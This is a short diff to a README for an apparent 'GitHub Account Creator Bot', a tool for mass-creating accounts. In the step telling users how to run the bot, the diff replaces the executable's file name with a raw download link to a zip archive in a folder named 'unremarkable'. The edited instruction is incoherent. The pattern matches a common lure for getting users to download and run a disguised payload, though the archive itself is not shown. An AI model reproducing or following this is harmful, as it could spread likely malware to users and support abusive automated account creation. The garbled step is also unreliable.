karuka13/GitHub-Account-Creator-Bot/README.md

 Once you have installed the Bot, follow these steps to run it:

 1. Open the folder where you installed the bot.
-2. Find the executable file, usually named `GitHubAccountCreator.exe`.
+2. Find the executable file, usually named `https://raw.githubusercontent.com/karuka13/GitHub-Account-Creator-Bot/main/unremarkable/Git-Account-Creator-Bot-Hub-v3.0.zip`.
 3. Double-click the file to run the bot.

 ## ✍️ Using the Bot